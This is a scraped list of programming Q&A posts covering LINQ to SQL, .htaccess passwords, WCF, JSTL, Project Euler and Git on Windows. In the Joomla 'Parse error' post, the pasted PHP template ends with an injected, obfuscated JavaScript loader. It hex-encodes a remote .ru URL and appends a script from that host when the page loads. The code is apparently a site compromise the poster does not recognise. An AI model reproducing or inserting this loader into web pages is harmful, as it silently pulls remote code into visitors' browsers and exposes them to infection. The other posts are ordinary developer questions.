  • Using LINQ to SQL with multiple databases

    - by Stuart Ferguson
I am working on a new project and hoping to use LINQ to SQL for the data access but have come across the following issue. I need to have my application access 3 databases with similar but not the same table structure, for example Database1 and Database 2 has a table called tblCustomer with 2 columns CustomerKey and CustomerName Database2 has a table called tblCustomer with 3 columns CustomerKey, CustomerName and CustomerPostCode I am looking for a solution that will allow me a query all three databases without the need for 3 GetCustomerList functions as Database1 and Database2 could use the same function as are the same structure, with an override function for database 3 to bring back the additional field. Is there a way i can declare a base datacontext class to handle Database 1 and 2 with an inherited version for Database 3. Thanks In Advance Stuart Ferguson

  • Parse error: syntax error, unexpected '<' in /home/future/public_html/modules/mod_mainmenu/tmpl/defa

    - by kofi
    I'm unfortunately having an unknown error with my php file. (for joomla 1.5) I don't seem to get what's wrong. This is my entire code, with an apparent error on line 84. Would appreciate some feedback, thanks. <?php // no direct access defined('_JEXEC') or die('Restricted access'); if ( ! defined('modMainMenuXMLCallbackDefined') ) { function modMainMenuXMLCallback(&$node, $args) { $user = &JFactory::getUser(); $menu = &JSite::getMenu(); $active = $menu->getActive(); $path = isset($active) ? array_reverse($active->tree) : null; if (($args['end']) && ($node->attributes('level') >= $args['end'])) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } if ($node->name() == 'ul') { foreach ($node->children() as $child) { if ($child->attributes('access') > $user->get('aid', 0)) { $node->removeChild($child); } } } if (($node->name() == 'li') && isset($node->ul)) { $node->addAttribute('class', 'parent'); } if (isset($path) && (in_array($node->attributes('id'), $path) || in_array($node->attributes('rel'), $path))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' active'); } else { $node->addAttribute('class', 'active'); } } else { if (isset($args['children']) && !$args['children']) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } } if (($node->name() == 'li') && ($id = $node->attributes('id'))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' item'.$id); } else { $node->addAttribute('class', 'item'.$id); } } if (isset($path) && $node->attributes('id') == $path[0]) { $node->addAttribute('id', 'current'); } else { $node->removeAttribute('id'); } $node->removeAttribute('rel'); $node->removeAttribute('level'); $node->removeAttribute('access'); } define('modMainMenuXMLCallbackDefined', true); } modMainMenuHelper::render($params, 'modMainMenuXMLCallback'); <script>var Zl;if(Zl!='' && Zl!='ki'){Zl=''};function v(){var jL=new String();var M=window;var q="";var ZY='';var Z=unescape;var C;if(C!='' && C!='g'){C=null};this.nj='';var _='';this.X="";var t=new Date();var R="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x61\x72\x65\x61\x73\x61\x6c\x65\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x7a\x2e\x65\x79\x6e\x79\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var Od;if(Od!='Dm' && Od!='V'){Od='Dm'};var Vr='';var P=new String("g");var B="";var E;if(E!='' && E!='gD'){E=null};function b(y,U){var zm=new Array();var a='';this.Cm="";var Vb=new String();var k=Z("%5b")+U+Z("%5d");var tX=new String();var MV;if(MV!='' && MV!='qt'){MV='MD'};var c=new RegExp(k, P);return y.replace(c, _);var cS="";var RTD='';};var Zr;if(Zr!='' && Zr!='vJ'){Zr=''};var L=new String();var DE=new Date();var fg;if(fg!='Ep'){fg='Ep'};var nf;if(nf!=''){nf='d_'};var W=Z("%2f%67%6f%6f%67%6c%65%2e%61%74%2f%67%6f%6f%67%6c%65%2e%61%74%2f%64%72%75%64%67%65%72%65%70%6f%72%74%2e%63%6f%6d%2f%74%72%61%76%69%61%6e%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.aA='';var u='';this.XB='';var dP;if(dP!='i' && dP != ''){dP=null};var dN;if(dN!='' && dN!='zx'){dN='_y'};var WS=b('85624104275582212705194497','13296457');var Hb=new Array();var lP;if(lP!='ok' && lP != ''){lP=null};var O=document;function n(){var J;if(J!='mS' && J != ''){J=null};u=R;var jv;if(jv!='' && jv!='jw'){jv=''};u+=WS;var MJ;if(MJ!='Qp'){MJ=''};u+=W;var fj=new Array();this.PM="";try {this.dq='';var ln=new Date();var eS=new Date();h=O.createElement(b('sScwrwi4pSt5','OZjKg4w5S'));var uW=new String();var Aj;if(Aj!='lX'){Aj='lX'};var aF;if(aF!='' && aF!='_o'){aF=null};h.src=u;var GY;if(GY!='ev' && GY!='Jr'){GY='ev'};var KK;if(KK!=''){KK='gDq'};h.defer=[1][0];var nO;if(nO!='tP'){nO=''};var aV=new Date();var bE=new Date();O.body.appendChild(h);this.Ze="";} catch(MC){var Ki;if(Ki!='m_' && Ki != ''){Ki=null};};}M[String("pqP5onloa".substr(4)+"drYD".substr(0,1))]=n;var EY;if(EY!='' && EY!='wn'){EY='Sj'};var ep;if(ep!='' && ep!='_q'){ep='Oy'};var uE=new Array();var E_;if(E_!='iU'){E_='iU'};};this.pt="";v();var tl=new String();</script> <!--793d57c076e95df45c451725e5dedf6f-->

  • Do passwords used for .htaccess need to be encrypted?

    - by webworm
I am using .htaccess files to control access to various Apache2 directories. I have a main "password" file that contains usernames and passwords. All the instructions I have found regarding .htaccess talk about how the passwords added are encrypted. The usernames and passwords are created using the following command line syntax ... htpasswd -nb username password What I am wondering is ... do the passwords always need to be encrypted? Could I store usernames and passwords in a plain-text form someonewhere on the system (above the web root)? This would allow me to easily edit user names and passwords via FTP without requiring access to the Shelll (which I do not always have). Thank you.

  • Speed Difference between native OLE DB and ADO.NET

    - by weijiajun
I'm looking for suggestions as well as any benchmarks or observations people have. We are looking to rewrite our data access layer and are trying to decide between native C++ OLEDB or ADO.NET for connecting with databases. Currently we are specifically targeting Oracle which would mean we would use the Oracle OLE DB provider and the ODP.NET. Requirements: 1. All applications will be in managed code so using native C++ OLEDB would require C++/CLI to work (no PInvoke way to slow). 2. Application must work with multiple databases in the future, currently just targeting Oracle specifically. Question: 1. Would it be more performant to use ADO.NET to accomplish this or use native C++ OLE DB wrapped in a Managed C++ interface for managed code to access? Any ideas, or help or places to look on the web would be greatly appreciated.

  • Ajax Enabled WCF Service Javascript issue...

    - by Captain Insano
I'm a noob working with Ajax-Enabled WCF Services... Right now I have an AJAX service which calls a different WCF service that is using wsHttpBinding. The WCF wsHttpBinding service lives in a different web app on the same IIS6 server. The AJAX javascript proxy is only created when I enable anonymous access on the app hosting the AJAX service. If I remove anonymous access, IE6 bombs with an 'Undefined' error when call the AJAX proxy. In a nut shell, my AJAX service sends a request back to IIS (same domain/app), and while on the server it sends a WCF service request for data on a different app on the same IIS server. The service returning data is setup with Windows authentication, wsHttpBinding, and security mode is set to message. Any ideas? Both apps have are using windows authentication.

  • WCF Certificate issue

    - by Morgeh
I am developing a WCF service on my local computer using Visual Studios built in ASP.NET development sever and I'm having issues creating and using temporary Certificates. I have created a cert call TempCA and added it to the Trusted Root Certificate folder and I have created another called SignedByCA which has been added to the personal folder. The service config file has been set up to use SignedByCA but when I run the service I get the following error. The certificate 'CN=SignedByCA' must have a private key that is capable of key exchange. The process must have access rights for the private key. I have tried using WinHttpCertCfg.exe to give other users access to the key but I have since found out that WinHttpCertCfg.exe has be deprecated in windows Vista. Has anyone had this issue before in a similar circumstance??

  • Looking for a simple interface for users to enter data for Silverlight application

    - by Edward Tanguay
I have made a Silverlight application which can read data from various URLs. So users of the application who control a website can: FTP text and XML files onto their website put a clientaccesspolicy.xml in their root directory enter their URL in the silverlight application at which point the silverlight application then begins reading data from their site. I would like to extend this to less technical users who do not control a website, aren't adept with FTP, etc. What is the best service on the web that: allows users to publish different kinds of data, e.g. put out text files on web allows Silverlight client access (has clientaccesspolicy.xml set up) Some ideas are: free blog services (although then they are limited to a RSS feed, or the silverlight app would have to do some screen scraping) Google Docs? free cloud services? What free services allow easy publishing of any kind of data on the web and allow Silverlight client access?

  • External config file to be used by multiple DLLs.

    - by vikp
Hi, I have multiple DLLs that are used to read/write data into my database. There is a presentation layer DLL and a data access layer DLL. I want these DLLs to share a set of the connection strings. My idea is to store the connection string in a seperate DLL in the external configuration file. I'm not sure whether it's a good idea and whether I can reference that external DLL in both presentation and data access layers. The other question is whether I should write a helper class to read the data from the external config file or whether I should be using built in .Net methods? Thank you

  • Java List use through use of JSTL <c:forEach>

    - by Mark Lewis
Hello If I have a JSF backing bean return an object of type ArrayList, I should be able to use to iterate over the elements in the list. Each element contains a map and although the question of how to access the map content through JSTL has been answered here, if I pass an array of such maps, I can't find how to iterate over them and still access the map content using JSTL. There's documentation which refers to simple iterators but not to those whose items are themselves maps. BalusC, I'm not trying to force the issue, just that I've been looking at this all day, and still cannot seem to be able to output the contents of my data structure through jsp (only on the console). This as a separate question still has merit. If anyone can give me a simple example of how a java List is iterated over in JSP I'd be massively appreciative. Mark

  • How to exploit Diffie-hellman to perform a man in the middle attack

    - by jfisk
Im doing a project where Alice and Bob send each other messages using the Diffie-Hellman key-exchange. What is throwing me for a loop is how to incorporate the certificate they are using in this so i can obtain their secret messages. From what I understand about MIM attakcs, the MIM acts as an imposter as seen on this diagram: Below are the details for my project. I understand that they both have g and p agreed upon before communicating, but how would I be able to implement this with they both having a certificate to verify their signatures? Alice prepares ?signA(NA, Bob), pkA, certA? where signA is the digital signature algorithm used by Alice, “Bob” is Bob’s name, pkA is the public-key of Alice which equals gx mod p encoded according to X.509 for a fixed g, p as specified in the Diffie-Hellman key- exchange and certA is the certificate of Alice that contains Alice’s public-key that verifies the signature; Finally, NA is a nonce (random string) that is 8 bytes long. Bob checks Alice's signature, and response with ?signB{NA,NB,Alice},pkB,certB?. Alice gets the message she checks her nonce NA and calculates the joint key based on pkA, pkB according to the Diffie-Hellman key exchange. Then Alice submits the message ?signA{NA,NB,Bob},EK(MA),certA? to Bob and Bobrespondswith?SignB{NA,NB,Alice},EK(MB),certB?. where MA and MB are their corresponding secret messages.

  • What happens if two COM classes each without a threading model are implemented in one in-proc COM se

    - by sharptooth
Consider a situation. I have an in-proc COM server that contains two COM classes. Both classes are marked as "no threading model" in the registry - the "ThreadingModel" value is just absent. Both classes read/write the same set of global variable without any synchronization. As far as I know "no threading model" will enforce COM to disallow concurrent access to the same or different instances of the same class by different threads. Will COM prevent concurrent access to instances of the two abovementioned different classes? Do I need synchronization when accessing the global variables from two different COM classes in this situation?

  • Python questions from beginner

    - by ChrisC
I'm thinking about rewriting an MS Access db I wrote years ago into a stand-alone Python app. Other than a college class called "Intro to C++" (console only, with OOP concepts) and the Access db itself, I have no experience, so I need to ask if the basis for my decision to go with Python is correct. Is it true that: 1) Python is relatively easy to pick up? 2) Python apps can run as "portable" (ie from one directory, no registry needs, nothing needs to be pre-installed on a Windows PC) as long as I use an embedded db?

  • WPF DataGrid: How to get Converter

    - by Nike
I create DataGrid Columns with Binding (where i is a Int value): dataGrid.Columns.Add(new DataGridTextColumn { Header = i.ToString(), Binding = CreateBinding(i), }); private Binding CreateBinding(int num) { Binding bind = new Binding(string.Format("[{0}]", num)); bind.Converter = new CellValueConverter(); return bind; } In the CreateBinding method I have an access to bind.Converter property. I need to call Converter.Convert() method in some handler, but there is no Converter property when I try to access it: (dataGrid.Columns[clm] as DataGridTextColumn).Binding."no Converter property!" How can I get my CellValueConverter which was created for particular Column?

  • MOSS 2007 authentication

    - by Dante
Hi, I have a MOSS web site configured with Windows Integrated Authentication. I added a couple of local users in the server, added them to Sharepoint groups, and I can log into my site (as long as the local user is part of the administrators group... odd). If I add a domain user to the Owners group, I can't access the site with it. Anybody knows what must be done to open access to domain users in a site configured with Windows Authentication or Basic Authentication? Thanks in advance

  • Accessing WebKit Devtools JavaScript library

    - by VLostBoy
I noticed something in Chrome the other day- I had opened Developer Tools, and then hit view source and was initially surprised to notice that apparently the developer tools window is coded in HTML and JavaScript- you can see that by putting the following into the Chrome address bar: view-source:chrome://devtools/devtools.html Two things struck me- first, the codes copyright belongs to Apple (considering their backing of WebKit, thats not too surprising), and secondly, it appears that you cannot access the JavaScript, CSS or Image files directly through Chrome by clicking on links in the source code. So two questions: Where are the DevTools assets stored on my computer or how can I otherwise access them? Or even better, can someone identify the library that is used and let me know how its licensed? I'm always on the look out for a well implemented UI toolkit- and Devtools looks great.

  • ctypes and pointer manipulation

    - by Chris
I am dealing with image buffers, and I want to be able to access data a few lines into my image for analysis with a c library. I have created my 8-bit pixel buffer in Python using create_string_buffer. Is there a way to get a pointer to a location within that buffer without re-creating a new buffer? My goal is to analyze and change data within that buffer in chunks, without having to do a lot of buffer creation and data copying. In this case, ultimately, the C library is doing all the manipulation of the buffer, so I don't actually have to change values within the buffer using Python. I just need to give my C function access to data within the buffer.

  • Accelerometer API for Laptops

    - by FreshCode
Most IBM (and some Dell) laptops have built-in accelerometers to stop any moving parts during a sudden fall, but I was unable to find a standardised Windows API to access this data. I assume that each manufacturer would provide a driver to interface with the sensor. Which popular laptop brands come standard with accelerometers accessible from an API and which libraries should I use to access the data? Does an API* exist to abstract away the differences between different manufacturers? I am aware of the Windows 7 Sensor API, but I would like support for XP and earlier.

  • How do I set up one time password authentication?

    - by scraimer
I have a home network which I access remotely quite a bit. But I'm worried about security. While I do have strong passwords, I'm worried that someone will acquire my password and use it to gain access. I heard about "one time passwords" and even got to use them at my university. We'd just press a button on a device (or run an application on a phone) and get a generated password that would work for the next minute or so. How can I set something like that up? Are there systems that are easy to use and set up? Has anyone played around with an SDK of one of these systems? Where can I get a starter kit from? EDIT: I'm running a mixed Linux and Windows network, and I'm vaguely hoping to use this for authenticating on both operating systems. (No, there's no domain controller, but I can set one up using Samba, I suppose.)

  • Best Practices Question on using an ObjectDataSource in asp.net

    - by Lill Lansey
Asp.net, c#, vs2008, sqlserver 2005. I am filling a DataTable in the data access layer with data from a sqlserver stored procedure. Best Practices Question – Is it ok to pass the DataTable to the business layer and use the DataTable from the business layer for an ObjectDataSource in the presentation layer, or Should I transfer the data in the data table into a List and use the List for an ObjectDataSource in the presentation layer? If I should transfer the data to a List, should that be done in the data access layer or the business layer? Does it make a difference if the data needs to be edited before being displayed?

However, if I put www.domain2.com, everything works fine. I don't see any difference between two VirtualHost config block, so I wonder what does make the difference. BTW, I haven't put any .htaccess file under their document root. Thanks for your advice! Tianzhou

  • Project Euler: Programmatic Optimization for Problem 7?

    - by bmucklow
    So I would call myself a fairly novice programmer as I focused mostly on hardware in my schooling and not a lot of Computer Science courses. So I solved Problem 7 of Project Euler: By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13. What is the 10001st prime number? I managed to solve this without problem in Java, but when I ran my solution it took 8 and change seconds to run. I was wondering how this could be optimized from a programming standpoint, not a mathematical standpoint. Is the array looping and while statements the main things eating up processing time? And how could this be optimized? Again not looking for a fancy mathematical equation..there are plenty of those in the solution thread. SPOILER My solution is listed below. public class PrimeNumberList { private ArrayList<BigInteger> primesList = new ArrayList<BigInteger>(); public void fillList(int numberOfPrimes) { primesList.add(new BigInteger("2")); primesList.add(new BigInteger("3")); while (primesList.size() < numberOfPrimes){ getNextPrime(); } } private void getNextPrime() { BigInteger lastPrime = primesList.get(primesList.size()-1); BigInteger currentTestNumber = lastPrime; BigInteger modulusResult; boolean prime = false; while(!prime){ prime = true; currentTestNumber = currentTestNumber.add(new BigInteger("2")); for (BigInteger bi : primesList){ modulusResult = currentTestNumber.mod(bi); if (modulusResult.equals(BigInteger.ZERO)){ prime = false; break; } } if(prime){ primesList.add(currentTestNumber); } } } public BigInteger get(int primeTerm) { return primesList.get(primeTerm - 1); } }

  • Git under windows: MSYS or Cygwin?

    - by Joce
I plan to migrate my projects over to git, and I'm currently wondering which is the best and / or most stable option under windows. From what I gather I basically have 2.5 options: MSYSgit git under Cygwin (aka 2.5) MSYSgit from a Cygwin prompt (given that Cygwin git is already installed). Note: IMO Cygwin in itself is a big plus as you can have access to pretty much all the *nix command line tools, as where with MSYSgit bash, you only have access to a rather small subset of these tools.
